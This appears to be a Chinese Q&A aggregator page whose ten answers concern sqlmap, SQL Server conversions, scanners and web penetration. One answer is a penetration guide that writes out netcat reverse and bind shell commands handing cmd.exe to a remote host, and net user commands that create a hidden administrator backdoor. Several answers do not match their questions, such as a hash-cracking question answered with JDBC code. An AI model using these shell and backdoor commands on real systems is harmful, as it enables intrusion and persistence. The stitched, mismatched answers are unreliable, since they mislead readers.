当前位置:首页 » 编程语言 » sqlmapsqlserver
扩展阅读
webinf下怎么引入js 2023-08-31 21:54:13
堡垒机怎么打开web 2023-08-31 21:54:11

sqlmapsqlserver

发布时间: 2023-01-26 07:26:17

1. 漏洞扫描工具哪个好

您好,希望以下回答能帮助您
流光 x-scan x-way 都不错!个人推荐用x-scan! 其实流光更好用!只不过每次用的时候要关掉杀毒软件!
如您还有疑问可继续追问。

2. Postgresql存储过程转换SQLServer的

因sql server2000中不允许调用当前时间的函数getdate(),也不允许非表变量之外的update、insert、delete操作,故这里修改为存储过程,其中原来的return值改用输出参数"@Result int output"来实现,具体如下:

CREATE PROCEDURE web_login(@web_username varchar(50), @web_pwd varchar(50), @web_ip varchar(50),@Result int output)
AS
BEGIN
declare
@len int, -- -2 fail -3 lockip
@u_locktime varchar(10),
@u_cleartime varchar(50),
@u_count int,
@user_id int,
@log_id int,
@cal int

set @len=0

select @u_count=config_value from as_all_config where config_item='U_AllowCount'
select @u_cleartime=config_value from as_all_config where config_item='U_LimitDay'
set @cal=@u_cleartime
select @u_locktime=config_value from as_all_config where config_item='U_Locktime'
--判断用户是否已经锁定
select top 1 @len=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and last_lock_time<getdate() and last_count= @u_count
if @len>0
begin
insert into as_log(log_fromtype, log_type,log_text, log_level) values(8,4,'用户 '+@web_username+'登录失败 ip锁定',1)
set @Result=-3
RETURN
end
--判断用户失败次数
select top 1 @len=last_count,@log_id=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and convert(varchar(10),last_fail_time,120)=convert(varchar(10),getdate(),120) order by last_fail_time desc
if @len>3
begin
update web_user_log set last_lock_time=getdate() where serialno=@log_id
insert into as_log(log_fromtype, log_type,log_text, log_level) values(8,4,'用户 '+@web_username+'登录失败 ip锁定',1)
set @Result=-3
RETURN
end
--正常操作
select top 1 @len=last_count, @log_id=serialno from web_user_log where login_id =@web_username and last_ip=@web_ip and convert(varchar(10),last_fail_time,120)=convert(varchar(10),getdate(),120) order by last_fail_time desc
select top 1 @user_id=serialno from web_user where login_id = @web_username and login_pwd=@web_pwd
delete from web_user_log where login_id =@web_username and last_lock_time<=convert(varchar(10),dateadd(day,-@cal,getdate()),120)
if @user_id>0
begin
insert into as_log( log_fromtype, log_type, log_text, log_level) values(8,4,'用户 '+@web_username+'登录成功',1)
set @Result=@user_id
RETURN
end
else if (@len is null or @len=0)
insert into web_user_log(last_count, last_ip, login_pwd, login_id) values(1,@web_ip,@web_pwd,@web_username)
else
update web_user_log set last_count=last_count+1 where serialno=@log_id

insert into as_log(log_fromtype, log_type, log_text, log_level)values(8,4,'用户 '+@web_username+'登录失败',1)
set @Result=-2
RETURN
END
go

--更改当前数据库中对象的所有者:
sp_changeobjectowner 'web_login','ema_user'
go

3. sqlmap探网页碍事吗

sqlmap探网页不碍事,sqlmap只是用来检测和利用sql注入点,对于探网页是并不妨碍的。

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,MicrosoftAccess,IBMDB2,SQLite,Firebird,Sybase和SAPMaxDB。

4. 把mysql语法改成sqlserver语法

这上面的SQL语句基本没有变化,
<![CDATA[SELECT LAST_INSERT_ID() AS ID ]]>---》SELECT @@IDENTITY
insert into t_docrecord(id,filename,doctype,lastmodify) values
(?,?,?,?)-》
insert into t_docrecord(id,filename,doctype,lastmodify) values
(@id,@filename,@doctype,@lastmodify)

select * from t_docrecord where filename=#value#->select * from t_docrecord where filename=@filename
下面一样的就不再改了,都改成@ID 开头,到时用SQL命名参数来处理,

5. C#sqlmapper怎么访问sqlserver,求写个例子和介绍

SqlMap.config文件
<database>
<provider name="sqlServer2005"/>
<dataSource name="iBatisNet" connectionString="Data Source=127.0.0.1;
Initial Catalog=sssssss;
User ID=sa;password=123"/>
</database>

<sqlMaps>

<sqlMap resource="Mappings/LocalDB/UserMapping.xml"></sqlMap>
</sqlMaps>

providers.config文件
<provider
name="sqlServer2005"
enabled="true"
.....


public class BaseDAL : IBaseDAL
{
ISqlMapper sqlMapper;

public BaseDAL()
{

sqlMapper = Mapper.Instance();
}

public BaseDAL(ISqlMapper map)
{
sqlMapper = map;
}

public int Insert<T>(string statementName, T t)
{
//ISqlMapper iSqlMapper = Mapper.Instance();
if (sqlMapper != null)
.....

别忘了新建的各种mapping的文件属性、嵌入或者内容始终复制,更别忘啦添加引用Mybatis的dll

6. sqlmap跑的hash怎么破解

首先得有这个 sqljdbc.jar 驱动包哦
下面是连接代码:
package com.message.;

/**
*BaseDao
*2009
*数据库连接包
*/
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class BaseDao{
public final static String driver = "com.microsoft.sqlserver.jdbc.SQLServerDriver"; // 数据库驱动
public final static String url = "jdbc:sqlserver://localhost:1433;DataBaseName=messageBoard";// url
public final static String dbName = "sa"; // 数据库用户名
public final static String dbPass = "sa"; // 数据库密码

/**
* 得到数据库连接
* @throws ClassNotFoundException
* @throws SQLException
* @return 数据库连接
*/
public Connection getConn(){
Connection con = null ;
try {
Class.forName(driver); //注册驱动
con = DriverManager .getConnection(url,dbName,dbPass); //获得数据库连接
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (SQLException e) {
e.printStackTrace();
}
return con ; //返回连接
}

/**
* 释放资源
* @param con 数据库连接
* @param prs PreparedStatement对象
* @param rs 结果集
*/
public void closeAll( Connection con, PreparedStatement prs, ResultSet rs ) {
/* 如果rs不空,关闭rs */
if(rs != null){
try { rs.close();} catch (SQLException e) {e.printStackTrace();}
}
/* 如果prs不空,关闭prs */
if(prs != null){
try { prs.close();} catch (SQLException e) {e.printStackTrace();}
}
/* 如果con不空,关闭con */
if(con != null){
try { con.close();} catch (SQLException e) {e.printStackTrace();}
}
}

/**
* 执行SQL语句,可以进行增、删、改的操作,不能执行查询
* @param sql 预编译的 SQL 语句
* @param param 预编译的 SQL 语句中的‘?’参数的字符串数组
* @return 影响的条数
*/
public int executeSQL(String preparedSql,Object[] param) {
Connection con = null;
PreparedStatement prs = null;
int num = 0;

/* 处理SQL,执行SQL */
try {
con = getConn(); // 得到数据库连接
prs = con.prepareStatement(preparedSql); // 得到PreparedStatement对象
if( param != null ) {
for( int i = 0; i < param.length; i++ ) {
prs.setObject(i+1, param[i]); // 为预编译sql设置参数
}
}
num = prs.executeUpdate(); // 执行SQL语句
} catch (SQLException e) {
e.printStackTrace(); // 处理SQLException异常
} finally {
closeAll(con,prs,null); // 释放资源
}
return num;
}

}

7. [Microsoft][SQLServer 2000 Driver for JDBC][SQLServer]用户 'sa' 登录失败。

大哥! SQL2000在1,4版本上也能用吗?好象是1.5的才行吧

8. 漏洞扫描工具有哪些

杀毒软件,电脑管家之类都可检查系统漏洞和下载安装补丁。系统自己也有自动更新设置。

9. web渗透是什么

Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。

Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。

信息收集

信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。

DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)

整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;

网站常见搭配为:

ASP和ASPX:ACCESS、SQLServer

PHP:MySQL、PostgreSQL

JSP:Oracle、MySQL

敏感目录信息(御剑,dirbust)

开放端口信息(nmp)

漏洞扫描

利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。

常见漏洞:

SQL注入

XSS跨站脚本

CSRF跨站请求伪造

XXE(XML外部实体注入)漏洞

SSRF(服务端请求伪造)漏洞

文件包含漏洞

文件上传漏洞

文件解析漏洞

远程代码执行漏洞

CORS跨域资源共享漏洞

越权访问漏洞

目录遍历漏洞和任意文件读取/下载漏洞

漏洞利用

用工具也好什么也好对相应漏洞进行利用

如:

Sql注入(sqlmap)

XSS(BEEF)

后台密码爆破(burp)

端口爆破(hydra)

提权

获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权

内网渗透

首先进行端口转发可用nc

nc使用方法:

反向连接

在公网主机上进行监听:

nc-lvp 4444

在内网主机上执行:

nc-e cmd.exe 公网主机ip4444

成功之后即可得到一个内网主机shell

正向连接

远程主机上执行:

nc-l -p 4444 -t -e cmd.exe

本地主机上执行:

nc-vv 远程主机ip4444

成功后,本地主机即可远程主机的一个shell

然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门

留后门

对于网站上传一句话木马,留下后门

对于windows用户可用hideadmin创建一个超级隐藏账户

手工:

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。

10. 如何使用sqlmap扫描sql注入漏洞

先准备好MS SQLServer和MySQL的jdbc驱动。 在Oracle SQLDeveloper引入驱动: 工具--首选项--数据库--第三方jdbc驱动程序 最后在新建链接时,就可以看到sqlserver和mysql的标签了。